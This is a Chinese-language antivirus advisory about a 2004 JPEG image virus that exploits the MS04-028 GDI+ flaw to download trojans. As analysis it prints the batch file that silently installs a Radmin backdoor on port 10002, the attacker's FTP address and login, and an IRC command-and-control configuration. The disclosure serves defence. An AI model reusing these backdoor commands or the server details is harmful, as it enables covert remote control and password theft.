首个JPEG病毒携木马来袭 病毒攻击第一波

    利用微软新漏洞的图片病毒“图片骇客”（Exploit.Win32.MS04-028.gen）终于现身了，用户在浏览互联网图片时就会被木马病毒感染。这种图片病毒最要命的是用户在不知不觉当中就会中木马病毒，从而被远程计算机得到控制权。金山毒霸反病毒专家认为，如果用户浏览了带毒电子图片，就有可能泄露比如：网络游戏密码、qq账号、个人银行密码等关键信息，而且这种图片病毒有可能是美女、风景、小动物、甚至是好友的照片！让人防不甚防。



据金山毒霸反病毒中心监测，到目前为止这种图片病毒感染的例子还不多，但是这说明利用这个漏洞来传播的图片病毒现身了，第一波图片病毒攻击已经开始。最为可怕的是，以后还会有各种攻击出现，不仅会带木马病毒，包括一些恶性蠕虫、破坏数据的病毒都会以图片病毒作为掩饰来进行破坏。



金山反病毒中心介绍，该图片病毒利用MS04-028的GDI+漏洞，如果用户机器没有打相应补丁，并使用资源管理器浏览了该文件，可能导致用户机器从连接木马种植者指定的FTP地址，并从该FTP下载木马文件，并运行这些木马，以达到远程监控感染机器目的。



专家提醒：用户应立即打上各种应用程序补丁，如果怀疑机器染毒，电脑用户可查看机器10002端口有无程序访问，以防木马病毒偷盗各种密码。



目前，金山毒霸已经进行了紧急病毒库升级，可以防杀利用此漏洞制造的图片病毒。并且免费提供图片病毒专杀工具（下载地址：http://db.kingsoft.com/special/virtusspecial/JPEG/index.shtml），欲了解更多相关信息请登陆http://db.kingsoft.com信息安全网站。



技术资料分析：



病毒名称:Exploit.JPEG



病毒长度:4098



威胁级别:二级



中文名称:图片骇客



病毒别名:



Exploit.Win32.MS04-028.gen[AVP]



受影响系统:未打MS04-028补丁的英文版WinXP SP1



发现时间:9月28日



病毒简介:



金山反病毒中心介绍，该病毒利用MS04-028的GDI+漏洞，如果用户机器没有打相应补丁，并使用资源管理器浏览了该文件，可能导致用户机器从连接木马种植者指定的FTP地址，并从该FTP下载木马文件，并运行这些木马，以达到远程监控感染机器目的



技术细节:



当用户通过资源管理器浏览该文件后，病毒会利用GDI+漏洞，尝试溢出执行下载命令。如果溢出失败，则会导致资源管理器崩溃



如果溢出成功，则病毒尝试从以下FTP上下载远程控制文件



ftp://2××.1××.4×.2×/www/system/



文件包括：



文件名 大小



AdmDll.dll 90112



Fport.exe 114688



ServUStartUpLog.txt 663



VNCHooks.dll 32768



WinRun.dll 1407



WinRun.exe 811008



driver.log 1268



drives.exe 24576



execute.bat 150



filter3.ocx 0



irc-u.cfg 1052



irc-u.dat 0



irc-u.debug.log 16802



irc-u.dll 102400



kill.exe 26624



nc.exe 59392



nvsvc.exe 241664



nvsvc32.dll 36864



omnithread_rt.dll 45056



peek.exe 34304



raddrv.dll 29408



radmin.reg 713



rcrypt.exe 26112



reg.exe 40960



uptime.exe 6656



vns.exe 208896



3、运行execute.bat 文件，通过Radmin远程管理工具，建立后门，端口为10002。



4、会建立一个IRC连接，连接到#FurQ频道。



0.其他信息:



FTP地址如下：



ftp://209.171.43.27/www/system/



用户名：bawz



密码：pagdba



execute.bat 内容如下



regedit.exe /s radmin.reg



nvsvc.exe /install /silence



nvsvc.exe /pass:hardcore /port:10002 /save /silence



nvsvc.exe /start /silence



net start r_server



IRC配置文件如下：



server1=irc.p2pchat.net



port1=7777



login=Darkbro0d



channel=#FurQ



password=letmein



nick1=Track100Mbit



nick2=Trck100#1



sfv=1



user=Trackmaster



login=darkbro0d



目前，金山毒霸已经进行了紧急病毒库升级，可以防杀利用此漏洞制造的图片病毒。欲了解更多相关信息请登陆http://db.kingsoft.com信息安全网站。